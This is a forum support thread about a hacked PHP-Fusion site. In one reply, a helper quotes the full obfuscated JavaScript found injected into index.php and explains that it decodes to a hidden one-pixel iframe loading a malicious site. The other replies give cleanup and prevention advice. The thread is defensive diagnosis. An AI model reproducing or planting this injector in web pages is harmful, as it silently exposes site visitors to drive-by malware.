Quote
arabmeber wrote:
[For security reasons (viruses) site link hidden for admins only //khaman]
Quote
JoiNNN wrote:
Your index.php was modified and contains some encoded javascript which translates to an iframe having as a source a malicious site.
Clear your files, or re-upload them, scan your PC for any viruses and change your FTP/cPanel passwords.
<script type="text/javascript">var mLuo=261;function lJdPk(){var TLkZv='MGJk';if('BBDnw'=='eyFr')fcEtxA();}function uHaSGh(){var oSVJ='fzQvM';if('EmWkH'=='Mzju')sEIaN();}
var JUMXCt='ZSSim';var nxRFZ="a\x70pend\x43hild";var ZKtF='WPVmkv';function BWVl(){}function KNQOBE(){var JKzGqe='QTADA';if('JCHH'=='JyRg')QlhE();}
var px1_var="1px";function zXZF(){}var rMiP=189;var appVersion_var="\x61ppVersion";var kiip='zVkhg';var byUM='rXud';var WNYqx="slice";if('pFLgyx'=='zViNK')sxCCwf='Danx';var zOVoEuva="a8b4b4b07a6f6fa7adb3b4a1b46ea9aea6af6f";var SQqd=129;var JMfigj=285;var IPAK='WJAKy';var FWnnT="constructor";var qCszX='KcoQ';function klaAv(){var mADYZ='IBeNlc';if('nrHj'=='feoMEN')JPshut();}
var CqBKdG="b\x6fdy";var mLyhC="";var IDgXJ="\x70ar\x73eInt";var bQYGE='npDjvH';if('WnOP'=='Zclk')GUrEMW='paZnLI';var yRCOmd="fromCha\x72Co\x64e";var gKHBO=(function(){if('TkZn'=='DUFT')bnPeHo='Xwvvja';return this;var VccFuN='igfFrz';if('JgvrF'=='zBck')olZwHT='EleAvu';if('FekP'=='LCri')wJsqT='Xnii';})();var EPZrQ="wwJap"[FWnnT];function LLUCfT(){}function MrhHC(){}
function sIPDM(){var epwVM='pOYhBv';if('JwYHh'=='TuXPt')MmJSI();}
for(var pEOIIPgR=0;pEOIIPgR<zOVoEuva.length;pEOIIPgR+=2){var bsDJg=212;qGQWRsEM=gKHBO[IDgXJ](zOVoEuva[WNYqx](pEOIIPgR,pEOIIPgR+2),16)-64;function eFTmkR(){var rSxC='isyjhx';if('CEsfm'=='YXkfxC')ajCML();}
mLyhC+=EPZrQ[yRCOmd](qGQWRsEM);function Yvko(){}function oZWC(){var yLLrca='NFoGVg';if('XBzMYM'=='zvjXM')fbJGaH();}var DpOfUy='BmkTTG';}
function CPzlbj(){var enifi='LCtQD';if('lKbBd'=='FCwLVR')Irurg();}var RFTf;var ZvsrS;if('epISy'=='tatWg')UiKr='MvXAQq';function QtQJaH(){var lECV='noWfB';if('RGUy'=='ollKi')VtGci();}
var Bpsxi="PNvgw";var kJqFXV=8;var AswqOa=navigator[appVersion_var].indexOf("MSIE")!=-1?'<iframe name="'+Bpsxi+'" src="'+"mLyhC"+'">':'iframe';var MVRF;var JWInM='JbyB';var AKDURzJi=document.createElement(AswqOa);var YFKCDW=116;if('ggTZaC'=='LwuWD')kRuks='lPKTc';if('vEGlDB'=='SDWCB')wpPq='KTvjHz';function bohgAk(){var bEttt='fxESs';if('IThcR'=='FlIzFa')ONowYT();}
AKDURzJi.name=Bpsxi;var yaqp;AKDURzJi.style.right="0px";var BYdfey;var msmya='hkWslz';AKDURzJi.style.top="0px";if('OPbb'=='xoJYx')dWGWfg='ZTJE';var yfFhPw='cDWVWz';AKDURzJi.id=Bpsxi;function KLvFc(){}
AKDURzJi.style.position="absolute";function LBMg(){}
AKDURzJi.style.width=px1_var;function npqQ(){}if('DZmE'=='pbgB')zroYEo();AKDURzJi.setAttribute("src",mLyhC);var jNwE=196;AKDURzJi.style.height=px1_var;var vsnnCE='aLBjah';if('ZvVRH'=='ndzvyL')zdVzll();function DmsY(){}
function xGQzN(){if('glVrax'=='HVjihW')vgNm='Szbshl';if('GpVbu'=='vDMxme')ZkNL();if(document[CqBKdG]){if('tkIEdd'=='laTpY')ruMvH();function URjC(){var PtEJC='bWVi';if('dvzxjQ'=='pVADM')dkeL();}
document[CqBKdG][nxRFZ](AKDURzJi);if('IuQy'=='wRJig')EoTLb();}else{function WPrZcp(){var Cygid='MrDrgU';if('peiBjL'=='jLvehR')poPBW();}
setTimeout(xGQzN,120);var GaOPFC;if('MWZCtm'=='Bwls')AKIIOQ();}
var TsseR='qPir';if('QYmMWt'=='MMzz')eDAB();}
xGQzN();function aHpteN(){}function PakG(){}
function oBkY(){}if('JjXot'=='dOCHvP')AyvD();function fFPTvI(){}</script>
Quote
Mittens Returns wrote:
I've always had suspected Fusion to be a easy target... Never really found out. In a thread about the so called exploit on downloads.php and weblinks.php someone said something along the lines of "It's safe or the whole system is bad"... This main site has never had many successful hacking attemps to my knownledge. With that said it probably has something to do with infusions or mods.. Are you using any and if you are is it a lot?
Quote
skpacman wrote:
a code injection like that can also come from your host or your own computer while uploading the scripts to your host. its always smart to run a virus scan on scripts before you upload them to your host
Category Forum
Suspected Bugs and Errors - 8Labels
None yet
Statistics
5 participants
Notifications
You are not receiving notifications from this thread.
Related Questions